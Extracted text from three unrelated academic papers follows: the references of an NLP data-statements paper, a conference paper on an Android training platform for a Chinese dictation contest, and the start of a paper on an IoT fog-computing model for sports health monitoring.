term, it should enable research that specifically addresses issues of bias and exclusion, promote the development of more representative datasets, and make it easier and more normative for researchers to take stake- holder values into consideration as they work. In foregrounding the information about the data we work with, we can work toward making sure that the systems we build work for diverse populations and also toward making sure we are not teach- ing computers about the world based on the world views of a limited subset of people. Granted, it will take time and experience to de- velop the skill of writing carefully crafted data statements. However, we see great potential ben- efits: For the scientific community, researchers will be better able to make precise claims about how results should generalize and perform more targeted experiments around reproducing results for datasets that differ in specific characteristics. For industry, we believe that incorporating data statements will encourage the kind of conscien- tious software development that protects compa- nies’ reputations (by avoiding public embarrass- ment) and makes them more competitive (by cre- ating systems used more fluidly by more people). For the public at large, data statements are one piece of a larger collection of practices that will enable the development of NLP systems that eq- uitably serves the interests of users and indirect stakeholders. Acknowledgments We are grateful to the following people for help- ful discussion and critical commentary as we de- veloped this paper: the anonymous TACL review- ers, Hannah Almeter, Stephanie Ballard, Chris Curtis, Leon Derczynski, Michael Wayne Good- man, Anna Hoffmann, Bill Howe, Kristen How- ell, Dirk Hovy, Jessica Hullman, David Inman, Ta- dayoshi Kohno, Nick Logler, Mitch Marcus, An- gelina McMillan-Major, Rob Munro, Glenn Slay- den, Michelle Stamnes, Jevin West Daisy Yoo, Olga Zamaraeva, and especially Zeerak Waseeem and Ryan Calo. We have presented talks based on earlier versions of this paper at New York Uni- versity (Nov 2017), Columbia University (Nov 2017), University of Washington (Nov 2017), UC San Diego (Feb 2018), Microsoft (Mar 2018) and Macquarie University (July 2018) and thank the audiences at those talks for useful feedback. Fi- nally, Batya Friedman’s contributions to this paper were supported by the UW Tech Policy Lab and National Science Foundation Grant IIS-1302709. Any opinions, findings, and conclusions or rec- ommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the National Science Foundation. References AI Now Institute. 2018. Algorithmic impact assessments: Toward accountable automation in public agencies. Medium.com, https: //medium.com/@AINowInstitute/ algorithmic-impact-assessments- toward-accountable-automation- in-public-agencies-bd9856e6fdde, accessed 6 April 2018. American Psychological Association. 2009. Pub- lication Manual of the American Psychological Association, 6th edition. Author, Washington DC. Emily M. Bender. 2011. On achieving and evalu- ating language independence in NLP. Linguis- tic Issues in Language Technology, 6:1–26. Douglas Biber. 1995. Dimensions of Regis- ter Variation: A Cross-Linguistic Comparison. Cambridge University Press, Cambridge. Steven Bird and Gary Simons. 2000. White pa- per on establishing an infrastructure for open language archiving. In Workshop on Web- Based Language Documentation and Descrip- tion, Philadelphia, PA, pages 12–15. Tolga Bolukbasi, Kai-Wei Chang, James Y. Zou, Venkatesh Saligrama, and Adam T. Kalai. 2016. https://medium.com/@AINowInstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd9856e6fdde https://medium.com/@AINowInstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd9856e6fdde https://medium.com/@AINowInstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd9856e6fdde https://medium.com/@AINowInstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd9856e6fdde https://medium.com/@AINowInstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd9856e6fdde Man is to computer programmer as woman is to homemaker? Debiasing word embeddings. In D. D. Lee, M. Sugiyama, U. V. Luxburg, I. Guyon, and R. Garnett, editors, Advances in Neural Information Processing Systems 29, pages 4349–4357. Curran Associates, Inc. Nicoletta Calzolari, Valeria Quochi, and Claudia Soria. 2012. The strategic language resource agenda. http://www.flarenet.eu/ sites/default/files/FLaReNet_ Strategic_Language_Resource_ Agenda.pdf, accessed 6 August 2018. Jack K. Chambers and Peter Trudgill. 1998. Di- alectology, second edition. Cambridge Univer- sity Press. Danielle Keats Citron. 2008. Technological due process. Washington University Law Review, 85:1249–1313. TEI Consortium. 2008. TEI P5: Guide- lines for Electronic Text Encoding and In- terchange. http://www.tei-c.org/ guidelines/p5/, accessed 6 August 2018. Ben Coppin. 2004. Artificial Intelligence Illumi- nated. Jones & Bartlett Publishers, Sudbury MA. Alexei Czeskis, Ivayla Dermendjieva, Hussein Yapit, Alan Borning, Batya Friedman, Brian Gill, and Tadayoshi Kohno. 2010. Parenting from the pocket: Value tensions and techni- cal directions for secure and private parent-teen mobile safety. In Proceedings of the Sixth Sym- posium on Usable Privacy and Security. ACM. Leon Derczynski, Kalina Bontcheva, and Ian Roberts. 2016. Broad twitter corpus: A di- verse named entity recognition resource. In Proceedings of COLING 2016, the 26th Inter- national Conference on Computational Linguis- tics: Technical Papers, pages 1169–1179. The COLING 2016 Organizing Committee. Laurence Devillers, Björn Schuller, Emily Mower Provost, Peter Robinson, Joseph Mariani, and Agnes Delaborde, editors. 2016. Proceedings of ETHI-CA2 2016: ETHics in Corpus Collec- tion, Annotation & Application. LREC. Nicholas Diakopoulos. 2016. Accountability in algorithmic decision making. Communications of the ACM, 59(2):56–62. Penelope Eckert and John R. Rickford, editors. 2001. Style and Sociolinguistic Variation. Cambridge University Press, Cambridge. Rod Ellis. 1994. The Study of Second Language Acquisition. Oxford University Press, Oxford. Susan Ervin-Tripp. 1964. An analysis of the inter- action of language, topic, and listener. Ameri- can Anthropologist, 66(6_PART2):86–102. Karën Fort, Gilles Adda, and K. Bretonnel Cohen, editors. 2016. TAL et Ethique, special issue of Traitement automatique des languages, volume 57:2. Batya Friedman. 1997. Introduction. In Batya Friedman, editor, Human Values and the Design of Computer Technology, pages 1–18. Stanford CA, Stanford. Batya Friedman, David G Hendry, and Alan Born- ing. 2017. A survey of value sensitive de- sign methods. Foundations and Trends R© in Human–Computer Interaction, 11(2):63–125. Batya Friedman, Peter H. Kahn, Jr., and Alan Borning. 2006. Value sensitive design and in- formation systems. In Ping Zhang and Den- nis F. Galletta, editors, Human–Computer In- teraction in Management Information Systems: Foundations, pages 348–372. M. E. Sharpe, Ar- monk NY. Batya Friedman and Lisa P. Nathan. 2010. Multi- lifespan information system design: A research initiative for the HCI community. In Proceed- ings of the SIGCHI Conference on Human Fac- tors in Computing Systems, pages 2243–2246. ACM. Batya Friedman, Lisa P. Nathan, and Daisy Yoo. 2016. Multi-lifespan information system de- sign in support of transitional justice: Evolving situated design principles for the long(er) term. Interacting with Computers, 29:80–96. Batya Friedman and Helen Nissenbaum. 1996. Bias in computer systems. ACM Transactions on Information Systems (TOIS), 14(3):330–347. John Furler, Parker Magin, Marie Pirotta, and Mieke van Driel. 2012. Participant demograph- ics reported in “table 1” of randomised con- trolled trials: A case of “inverse evidence”? In- ternational Journal for Equity in Health, 11. http://papers.nips.cc/paper/6228-man-is-to-computer-programmer-as-woman-is-to-homemaker-debiasing-word-embeddings.pdf http://papers.nips.cc/paper/6228-man-is-to-computer-programmer-as-woman-is-to-homemaker-debiasing-word-embeddings.pdf http://www.flarenet.eu/sites/default/files/FLaReNet_Strategic_Language_Resource_Agenda.pdf http://www.flarenet.eu/sites/default/files/FLaReNet_Strategic_Language_Resource_Agenda.pdf http://www.flarenet.eu/sites/default/files/FLaReNet_Strategic_Language_Resource_Agenda.pdf http://www.flarenet.eu/sites/default/files/FLaReNet_Strategic_Language_Resource_Agenda.pdf http://openscholarship.wustl.edu/law_lawreview/vol85/iss6/2 http://openscholarship.wustl.edu/law_lawreview/vol85/iss6/2 http://www.tei-c.org/guidelines/p5/ http://www.tei-c.org/guidelines/p5/ http://aclweb.org/anthology/C16-1111 http://aclweb.org/anthology/C16-1111 https://doi.org/10.1145/2844110 https://doi.org/10.1145/2844110 https://doi.org/10.1093/iwc/iwv045 https://doi.org/10.1093/iwc/iwv045 https://doi.org/10.1093/iwc/iwv045 http://doi.org/10.1186/1475-9276-11-14 http://doi.org/10.1186/1475-9276-11-14 http://doi.org/10.1186/1475-9276-11-14 Timnit Gebru, Jamie Morgenstern, Briana Vec- chione, Jennifer Wortman Vaughan, Hanna Wallach, Hal Daumé III, and Kate Craw- ford. in prep. Datasheets for datasets. ArXiv:1803.09010v1. Dirk Hovy and Anders Søgaard. 2015. Tagging performance correlates with author age. In Pro- ceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natu- ral Language Processing (Volume 2: Short Pa- pers), pages 483–488. Association for Compu- tational Linguistics. Dirk Hovy, Shannon Spruit, Margaret Mitchell, Emily M. Bender, Michael Strube, and Hanna Wallach, editors. 2017. Proceedings of the First ACL Workshop on Ethics in Natural Lan- guage Processing. Association for Computa- tional Linguistics. Dirk Hovy and Shannon L. Spruit. 2016. The so- cial impact of natural language processing. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Vol- ume 2: Short Papers), pages 591–598. Associa- tion for Computational Linguistics. Anna Jørgensen, Dirk Hovy, and Anders Søgaard. 2015. Challenges of studying and processing dialects in social media. In Proceedings of the Workshop on Noisy User-generated Text, pages 9–18. Association for Computational Linguis- tics. David Jurgens, Yulia Tsvetkov, and Dan Jurafsky. 2017. Incorporating dialectal variability for so- cially equitable language identification. In Pro- ceedings of the 55th Annual Meeting of the As- sociation for Computational Linguistics (Vol- ume 2: Short Papers), pages 51–57. Association for Computational Linguistics. Svetlana Kiritchenko and Saif Mohammad. 2018. Examining gender and race bias in two hundred sentiment analysis systems. In Proceedings of the Seventh Joint Conference on Lexical and Computational Semantics, pages 43–53. Asso- ciation for Computational Linguistics. Dan Klein and Christopher D. Manning. 2003. Accurate unlexicalized parsing. In Proceedings of the 41st Annual Meeting of the Association for Computational Linguistics, pages 423–430. Association for Computational Linguistics. Roger Kreuz and Gina Caucci. 2007. Lexical influences on the perception of sarcasm. In Proceedings of the Workshop on Computational Approaches to Figurative Language, pages 1–4. Association for Computational Linguistics. Joshua A. Kroll, Joanna Huey, Solon Barocas, Ed- ward W. Felten, Joel R. Reidenberg, David G. Robinson, and Harlan Yu. 2017. Account- able algorithms. University of Pennsylvania Law Review, 165. Fordham Law Legal Stud- ies Research Paper No. 2765268. Available at SSRN: https://ssrn.com/abstract= 2765268, accessed 6 August 2018. William Labov. 1966. The Social Stratification of English in New York City. Center for Applied Linguistics, Washington, DC. Bing Liu. 2012. Sentiment Analysis and Opin- ion Mining, volume 5:1 of Synthesis Lectures on Human Language Technologies. Morgan & Claypool Publishers. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated corpus of English: The Penn Treebank. Computational Linguistics, 19:313– 330. Lawrence Mbuagbaw, Theresa Aves, Beverley Shea, Janet Jull, Vivian Welch, Monica Tal- jaard, Manosila Yoganathan, Regina Greer- Smith, George Wells, and Peter Tugwell. 2017. Considerations and guidance in design- ing equity-relevant clinical trials. International Journal for Equity in Health, 16(1):93. Davida Moher, Sally Hopewell, Kenneth F. Schulz, Victor Montori, Peter C. Gøtzsche, P. J. Devereaux, Diana Elbourne, Matthias Eg- ger, and Douglas G. Altman. 2010. CON- SORT 2010 explanation and elaboration: Up- dated guidelines for reporting parallel group randomised trials. The BMJ, 340. Robert Munro. 2015. Languages at ACL this year. Blog post, http://www. junglelightspeed.com/languages- at-acl-this-year/, accessed 22 Septem- ber 2017. http://www.aclweb.org/anthology/P15-2079 http://www.aclweb.org/anthology/P15-2079 http://www.aclweb.org/anthology/W17-16 http://www.aclweb.org/anthology/W17-16 http://www.aclweb.org/anthology/W17-16 http://anthology.aclweb.org/P16-2096 http://anthology.aclweb.org/P16-2096 http://www.aclweb.org/anthology/W15-4302 http://www.aclweb.org/anthology/W15-4302 http://aclweb.org/anthology/P17-2009 http://aclweb.org/anthology/P17-2009 http://aclweb.org/anthology/S18-2005 http://aclweb.org/anthology/S18-2005 https://doi.org/10.3115/1075096.1075150 http://www.aclweb.org/anthology/W/W07/W07-0101 http://www.aclweb.org/anthology/W/W07/W07-0101 https://ssrn.com/abstract=2765268 https://ssrn.com/abstract=2765268 https://doi.org/10.1186/s12939-017-0591-1 https://doi.org/10.1186/s12939-017-0591-1 http://doi.org/10.1136/bmj.c869 http://doi.org/10.1136/bmj.c869 http://doi.org/10.1136/bmj.c869 http://doi.org/10.1136/bmj.c869 http://www.junglelightspeed.com/languages-at-acl-this-year/ http://www.junglelightspeed.com/languages-at-acl-this-year/ http://www.junglelightspeed.com/languages-at-acl-this-year/ Robert Munro and Christopher D. Manning. 2010. Subword variation in text message classifica- tion. In Human Language Technologies: The 2010 Annual Conference of the North Ameri- can Chapter of the Association for Computa- tional Linguistics, pages 510–518. Association for Computational Linguistics. Lisa P. Nathan, Predrag V. Klasnja, and Batya Friedman. 2007. Value scenarios: A technique for envisioning systemic effects of new tech- nologies. In CHI’07 Extended Abstracts on Human Factors in Computing Systems, pages 2585–2590. ACM. Lisa P. Nathan, Milli Lake, Nell Carden Grey, Trond Nilsen, Robert F. Utter, Elizabeth J. Ut- ter, Mark Ring, Zoe Kahn, and Batya Fried- man. 2011. Multi-lifespan information system design: Investigating a new design approach in Rwanda. In Proceedings of the 2011 iConfer- ence, pages 591–597. ACM. Trond T. Nilsen, Nell Carden Grey, and Batya Friedman. 2012. Public curation of a historic collection: A means for speaking safely in pub- lic. In Proceedings of the ACM 2012 confer- ence on Computer Supported Cooperative Work Companion, pages 277–278. ACM. Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan. 2002. Thumbs up? Senti- ment classification using machine learning techniques. In Proceedings of the 2002 Conference on Empirical Methods in Nat- ural Language Processing, pages 79–86. Association for Computational Linguistics. Tomáš Ptáček, Ivan Habernal, and Jun Hong. 2014. Sarcasm detection on Czech and En- glish Twitter. In Proceedings of COLING 2014, the 25th International Conference on Compu- tational Linguistics: Technical Papers, pages 213–223. Dublin City University and Associa- tion for Computational Linguistics. Ellen Riloff, Ashequl Qadir, Prafulla Surve, Lalin- dra De Silva, Nathan Gilbert, and Ruihong Huang. 2013. Sarcasm as contrast between a positive sentiment and negative situation. In Proceedings of the 2013 Conference on Empir- ical Methods in Natural Language Processing, pages 704–714. Association for Computational Linguistics. Ben Shneiderman. 2016. Opinion: The dangers of faulty, biased, or malicious algorithms requires independent oversight. Proceedings of the Na- tional Academy of Sciences, 113(48):13538– 13540. Rob Speer. 2017. Conceptnet numberbatch 17.04: better, less-stereotyped word vectors. Blog post, https://blog.conceptnet. io/2017/04/24/conceptnet- numberbatch-17-04-better-less- stereotyped-word-vectors/, ac- cessed 6 July 2017. Rachael Tatman. 2017. Gender and dialect bias in YouTube’s automatic captions. In Proceedings of the First ACL Workshop on Ethics in Natu- ral Language Processing, pages 53–59. Associ- ation for Computational Linguistics. Zeerak Waseem. 2016. Are you a racist or am I seeing things? Annotator influence on hate speech detection on Twitter. In Proceedings of the First Workshop on NLP and Computational Social Science, pages 138–142. Association for Computational Linguistics. Zeerak Waseem and Dirk Hovy. 2016. Hateful symbols or hateful people? Predictive features for hate speech detection on Twitter. In Pro- ceedings of the NAACL Student Research Work- shop, pages 88–93. Association for Computa- tional Linguistics. Ke Yang, Julia Stoyanovich, Abolfazl Asudeh, Bill Howe, H. V. Jagadish, and Gerome Miklau. 2018. A nutritional label for rankings. In Pro- ceedings of the 2018 International Conference on Management of Data, SIGMOD ’18, pages 1773–1776, New York, NY, USA. ACM. Jieyu Zhao, Tianlu Wang, Mark Yatskar, Vicente Ordonez, and Kai-Wei Chang. 2017. Men also like shopping: Reducing gender bias amplifi- cation using corpus-level constraints. In Pro- ceedings of the 2017 Conference on Empiri- cal Methods in Natural Language Processing, pages 2941–2951. Association for Computa- tional Linguistics. http://www.aclweb.org/anthology/N10-1075 http://www.aclweb.org/anthology/N10-1075 https://doi.org/10.3115/1118693.1118704 https://doi.org/10.3115/1118693.1118704 https://doi.org/10.3115/1118693.1118704 http://www.aclweb.org/anthology/C14-1022 http://www.aclweb.org/anthology/C14-1022 http://www.aclweb.org/anthology/D13-1066 http://www.aclweb.org/anthology/D13-1066 https://doi.org/10.1073/pnas.1618211113 https://doi.org/10.1073/pnas.1618211113 https://doi.org/10.1073/pnas.1618211113 https://blog.conceptnet.io/2017/04/24/conceptnet-numberbatch-17-04-better-less-stereotyped-word-vectors/ https://blog.conceptnet.io/2017/04/24/conceptnet-numberbatch-17-04-better-less-stereotyped-word-vectors/ https://blog.conceptnet.io/2017/04/24/conceptnet-numberbatch-17-04-better-less-stereotyped-word-vectors/ https://blog.conceptnet.io/2017/04/24/conceptnet-numberbatch-17-04-better-less-stereotyped-word-vectors/ http://www.aclweb.org/anthology/W17-1606 http://www.aclweb.org/anthology/W17-1606 http://aclweb.org/anthology/W16-5618 http://aclweb.org/anthology/W16-5618 http://aclweb.org/anthology/W16-5618 http://www.aclweb.org/anthology/N16-2013 http://www.aclweb.org/anthology/N16-2013 http://www.aclweb.org/anthology/N16-2013 https://doi.org/10.1145/3183713.3193568 https://www.aclweb.org/anthology/D17-1319 https://www.aclweb.org/anthology/D17-1319 https://www.aclweb.org/anthology/D17-1319 work_3jhpujlx6zhmzidpnvccudpn5y ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 14 Research on Comprehensive Training Platform for Software Engineering Based on Android Pan Chunhua School of Computer Qinghai University for Nationalities Xining City, Qinghai Province e-mail: 155091145@qq.com Sun Yan School of Computer Qinghai University for Nationalities Xining City, Qinghai Province e-mail: sy0623@163.com Zan Fengbiao School of Computer Qinghai University for Nationalities Xining City, Qinghai Province e-mail: 835420632@qq.com Abstract—With respect to the training program of software engineering specialty, this paper puts forward the comprehensive training platform of Chinese character dictation competition based on Android, and clarifies the purpose and main contents of the comprehensive training platform. Based on the hardware and software facilities of the campus, the C / S model training platform, the use of Android integrated training platform to achieve the Chinese character writing, clearing, timing and other functions, managers of the entire process of the game management, including the participating teams and players, the administrator can simultaneously obtain the client input Chinese characters, and display on the big screen, the judges then give the results after the score and statistical display. The whole integrated training platform is light and practical. Keywords-C/S; Server; Client APP I. INTRODUCTION Software is applied in many aspects in modern society. Almost all industries have computer software applications, such as manufacturing, agriculture, banking, aviation, government agencies. Modern life is almost inseparable from mobile phone. Mobile applications are deployed in an incredible pace. These applications not only promote economic and social growth, but also improve the efficiency of work and life in general. The mainstream mobile phone operating systems include Android, IOS and, WP. With the building of training platform on Android system, software engineering professionals would cultivate their software analysis, design, development and maintenance capabilities, as well as skills in project organization & management, teamwork, technological innovation & market development. This provides good experimental teaching innovation in practical environment, and reform new ideas in the process. II. SKILLED REQUIRED FOR SOFTWARE ENGINEERING PROFESSIONALS Software engineering students need to learn discrete mathematics, object-oriented programming, data structure, data communication & computer network, database integrated-platform principle, software engineering, computer integrated-platform structure, software project management, unified modeling language, software quality and testing. Through a comprehensive training platform students can master the mainstream and the typical software development and debugging capabilities, understand the status of software engineering development and trends, acquire good communication skills and positive teamwork attitude. III. INTEGRATED TRAINING PLATFORM FEATURES AND CONTENT Software engineering professionals need to drive the theory, practice, network and experimental teaching as a whole, and complete the three-dimensional teaching as a complete teaching organization model. The comprehensive training platform is based on software engineering development practice: 1) To build a unified mainstream software technology, the standard is based on the C / S architecture of the integrated training platform; 2) Android-based APP is to imitate the training platform of the CCTV Chinese character dictation competition. The specific function is to provide students a Chinese characters interface to write and to submit the results. The server side allows the administrator to record the student’s message and question, correct and send the answers, and summarize personal performance and team results, and finally show the result rankings. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 15 IV. P ANDROID-BASED TRAINING PLATFORM A. Training platform system design The integrated training platform hardware requirement: A desktop computer installed with Windows and a Tablet PC installed Android system. This setup is simple and easy to operate, with a strong practical and promotional value. Software development system requires Java programming JDK and a variety of IDE (Eclipse or Netbeans environment), and database software (such as the commonly used Excel and access database, SQL Server 2005). The software for the entire training platform is common, easy to use, and reliable. B. Training platform architectural framework Chinese dictation system C lie n t m a n a g e m e n t P la y e r m a n a g e m e n t te st q u e stio n m a n a g e m e n t P e rfo rm a n c e m a n a g e m e n t e x a m in a tio n m a n a g e m e n t w ritin g d e le tin g su b m it in p u ttin g m o d ify in p u ttin g m o d ify e x p o rt in p u ttin g su m m a riz in g S e n d q u e stio n s S e n d m e ssa g e c o u n td o w n O th e r C o n firm to c o n tin u e Figure 1. Software Structure Diagram Modern computer science mathematical based graph theory, research shows that the structure determines the nature. The architecture of the training platform is also a hierarchical structure of the tree. Based on the C / S model two-tier model: the client + server (server program + database program). Results also shows, by the training platform architecture allows students to fully grasp software engineering’s required skills. 1) Client App program The client uses the countdown display control and input pen to write the required Chinese characters, complete the writing and modify the Chinese characters, submit the result, and then wait for the server to judge. as shown in Figure 2. contestant Write Chinese Submit erasure Figure 2. Client-side structure 2) Server-side manages the entire process of the competition Record the team and team members information, access client input Chinese characters and display on the big screen, server controls the time of competition, show the correct answer after the client completed the submission. The judges give the points and calculate the result of the competition. The structure is shown in Figure 3. Administrator Entry exam Entry player Player information display Answer the question Send information separately according to site time Call PPT display <> Performance management << extends>> Summary ranking Display of arbitration information Figure 3. Server-side Structure 3) Module functions  The client input: Students input words on the grid, complete the deletion of the whole word or erase a stroke, confirm the submission  Player information: Enter the modified unit, name information.  Test results management: Use ACCESSS database and Excel as a database with statistical support. Complete the entry, modify the questions and perform statistic functions.  Test management: Send the beginning of the test information, questions, time information, arbitration information, send the arbitration officer. 4) Network communication module Network communication concept and skillset is a weakness for many software engineering students. Understand and master the network architecture and communication model is the key to address this problem. This is the core part of the training platform. The end system in Figure 4 is the PC, mobile phones and other entities in the communication application process. The relay system is a router with routing and packet forwarding function. The development of network communication process based on Android system needs to have a bridge-like abstract unit connected to the application process. In the Android system, we can use the existing Socket class to complete, and the interface Socket in the TCP / IP architecture is located in the Application Layer and Transport Layer, as shown in Figure 5. From the figure if there is no interface, the entire communication will not be able to proceed; it is like we cannot send mail without postman. To understand the network structure specifically, students need to start from the horizontal peer-to-peer communication and the vertical direction of the actual data transfer. Understanding both the horizontal and the vertical levels of communication is difficult. The system training platform uses the TCP connection and socket interface to complete the underlying 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 16 communication, achieving the correct timing and answer transmission with the send and receive functions. Students through the Android based training platform can experience a specific communication process. ES Presentation Layer Session Layer Transport Layer Network Layer Datalink Layer Physical Layer ES relay system Transmission medium Application Layer Network Layer Datalink Layer Physical Layer Network Layer Datalink Layer Physical Layer Application Layer Presentation Layer Session Layer Transport Layer Network Layer Datalink Layer Physical Layer relay system Figure 4. Network OSI Reference Model Application Layer FTP、TELNET、HTTP、DNS SNMP、TFTP、NTP、DNS Transport Layer Network Layer TCP UDP IP The host to the network layer Network access layer socket Figure 5. TCP/IP Architecture A particular communication process: The Server first starts the service, the establishment of SOCKET and begins to listen to the state and waits to connect, and start the service. The Client press the start button, set the client writing time and other display information. The Client enters into the connection state, the Client answers. After entering the answer and establish a connection with the Server, the answer is sent to the Server-side. 5) Complete class diagram of the integrated training platform design The comprehensive training platform design and development uses the currently popular object-oriented approach. The design of the class and the various types of functional methods are: The boot interface Start, write interface class HztxView, write control class Hztx, and internal class (answer list class DatiListener, end of the answer list class JieshuListener, timing class MyCount), writing action classes MyAction and subclasses (writing class MyPath and erase class MyEraser), etc. … 6) Timing statistics function When the PC server sends a start entering command, the Android client counts down based on the received time and displays the correct answer at the end of the time for the judges and the audience to end the competition. The server can view all teams and player scores and rankings, and to send the required information to the client. V. CONCLUSION Writing Chinese characters is the transmission of Chinese civilization, enhance the understanding of Chinese culture, and increase the love of our country. The development of the integrated training platform for writing Chinese characters provides a good platform with good social benefits. The comprehensive training platform for Chinese character dictation competition exceeds the basic requirements of school Chinese characters. To process information and the final score and display on the big screen for the judges and the audience in public places for judgments meets the requirement of fairness for the competition. Through the training platform to create a way for students to take the initiative, self-learning environment, students can systematically master the basic knowledge of software engineering and software development of the whole process; train software engineering students other comprehensive ability, easy to use, functional software for the professional, to provide a complete, actual, open and simulated training integrated network platform. ACKNOWLEDGMENT Project support: Ministry of Education "Chunhui plan" cooperation research project 2015 project, project number: Z2015053 REFERENCES [1] Chinese character dictation conference, official website http://tingxie.cntv.cn/ [2] Wood grain. A cultural reflection from "dictation" [J]. Trade unions, 2013: 9. [3] Li Jiake .Android comprehensive training platform analysis and development. Lanzhou Jiaotong University master's degree thesis, 2014. [4] Zhang Shicheng. Based on Google Android platform application development and research [J]. Computer Knowledge and Technology, 2009 (28): 31-32. [5] Yang Fengsheng .Android application development Secret [M]. Beijing: Machinery Industry Press, 2011: 40-52. [6] He Baohong. From the fixed Internet to the mobile Internet [J]. Information and Communication Technology, 2010 (4): 54-58. [7] In-Stat.3G Internet applications will usher in blowout [J]. Weekly Computer News, 2008 (22): 26-27. Article in a conference proceedings. [8] H. Goto, Y. Hasegawa, and M. Tanaka, “Efficient Scheduling Focusing on the Duality of MPL Representatives,” Proc. IEEE Symp. Computational Intelligence in Scheduling (SCIS 07), IEEE Press, Dec. 2007, pp. 57-64, doi:10.1109/SCIS.2007.357670. http://tingxie.cntv.cn/ work_3jqyjxcrlveslbwv26j5kxcd4m ---- A novel IoT-based health and tactical analysis model with fog computing A novel IoT-based health and tactical analysis model with fog computing Aykut Karakaya1 and Sedat Akleylek2 1 Department of Computer Technologies, Bulent Ecevit University, Zonguldak, Turkey 2 Department of Computer Engineering, Ondokuz Mayis University, Samsun, Turkey ABSTRACT In sports competitions, depending on the conditions such as excitement, stress, fatigue, etc. during the match, negative situations such as disability or loss of life may occur for players and spectators. Therefore, it is extremely important to constantly check their health. In addition, some strategic analyzes are made during the match. According to the results of these analyzes, the technical team affects the course of the match. Effects can have positive and sometimes negative results. In this article, fog computing and an Internet of Things (IoT) based architecture are proposed to produce new technical strategies and to avoid disabilities. Players and spectators are monitored with sensors such as blood pressure, body temperature, heart rate, location etc. The data obtained from the sensors are processed in the fog layer and the resulting information is sent to the devices of the technical team and club doctors. In the architecture based on fog computing and IoT, priority processes are computed with low latency. For this, a task management algorithm based on priority queue and list of fog nodes is modified in the fog layer. Authentication and data confidentiality are provided with the Federated Lightweight Authentication of Things (FLAT) method used in the proposed model. In addition, using the Software Defined Network controller based on blockchain technology ensures data integrity. Subjects Algorithms and Analysis of Algorithms, Computer Networks and Communications, Emerging Technologies, Security and Privacy Keywords Internet of things, Health monitoring, Information security, Fog computing, Tactical analysis, Blockchain INTRODUCTION With the use of technological developments in the fields of health and sports, more efficient methods are obtained than traditional ones. Data such as player health, spectator health, and tactical analysis in the match are very important. Instantly checking the health status of people on and off the field, and early detection of certain events in tactical analysis make the competition better. For this, applications based on the Internet of Things (IoT) are quite suitable. Most IoT applications use cloud services for storage and computing. Using fog computing improves efficiency for a large-scale IoT application involving spectators, players and other actors. Since a sports field is within certain limits, the data can be processed on local servers instead of the remote cloud server. This ensures that responses are delivered to the user with low latency because it is important to get quick response to technical team and doctors in terms of early intervention (Ikram, Alshehri & Hussain, 2015). How to cite this article Karakaya A, Akleylek S. 2021. A novel IoT-based health and tactical analysis model with fog computing. PeerJ Comput. Sci. 7:e342 DOI 10.7717/peerj-cs.342 Submitted 7 October 2020 Accepted 30 November 2020 Published 3 February 2021 Corresponding author Aykut Karakaya, aykut.karakaya@bil.omu.edu.tr Academic editor Muhammad Tariq Additional Information and Declarations can be found on page 31 DOI 10.7717/peerj-cs.342 Copyright 2021 Karakaya and Akleylek Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.342 mailto:aykut.�karakaya@�bil.�omu.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.342 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Fog computing offers decentralized architecture in cloud computing by expanding storage, computing and network resources to the edge of the network to support large-scale IoT applications. Cloud and fog provide computing, storage, application, infrastructure and data sources (Luan et al., 2015). There are some important differences between them. The main difference is accessibility and proximity. The fog is close to the nodes in the system and is usually located on the local network. Cloud, on the other hand, is the server or data center accessed anywhere on the internet. Fog extends the cloud using virtualization to create virtual sensors and networks. In other words, fog works like a layer between nodes and the cloud (Mukherjee et al., 2017). It helps with data analysis, data processing and filtering and increases security for sensitive data. While the cloud is more central, the fog works more efficiently in distributed applications. Important points in terms of tactical analysis in sports: determining the most appropriate rust analysis, helping coaches in replacement, taking measures against problems that may arise when the tactical order is broken, etc. Important point in terms of health is determining the negative health conditions of players and spectators during the match, such as disability. There are studies in the literature for tactical analysis. With Voronoi graph and Delaunay triangulation, possible pass combinations and analysis of quality pass conditions were created (Horton et al., 2015). Detailed data such as how fast, strong, smart for a player was collected and could be analyzed during the match (Burn-Murdoch, 2018). Some well-known methods are: the shading method that predicts the most probable moves of the players against certain events, the dominant regions method that enables determining the regions where a player can arrive earlier than other players using the Voronoi graph (Taki & Hasegawa, 2000). Related Work In a study conducted as a feedback system in sports, data were expanded to examine exercise practices (Baca & Kornfeind, 2006). Trials were made in table tennis, biathlon and rowing sports. In table tennis, the system detects the effects of the ball on the table in order to determine the accuracy of the shot. In the biathlon, the position of the rifle barrel before and after the shot was analyzed with a laser positioning system. In rowing, the system has been calculated the effort made for rowing. In this study, the system is not flexible, as it depends on sports. In another study, the health status of marathon runners was monitored with a WSN (Pfisterer et al., 2006). Data was collected with sensors in runners and analyzed offline in a database. Systems that provide video feedback for athletes could also compare athletes (Vales-Alonso et al., 2010). However, these studies are not real time. In real-time studies, the perceived data with a WSN monitoring cyclists were compared with predefined datasets and provides feedback to the group of cyclists. The system could tell the cycling group to change their order, divide or increase their speed. Environmental data are not taken into consideration in this study. However, environmental factors such as wind speed, temperature and humidity can also affect this situation. In a dynamic study dealing with environmental factors, spline-based numerical Karakaya and Akleylek (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.342 2/34 http://dx.doi.org/10.7717/peerj-cs.342 https://peerj.com/computer-science/ approach techniques were recommended as a decision making method (Vales-Alonso et al., 2010). Besides the physical conditions of the athlete, the conditions of the land were also handled and the athlete was guided. The spline approach has been used because some structures such as Support Vector Machine (SVM) previously required a lot of 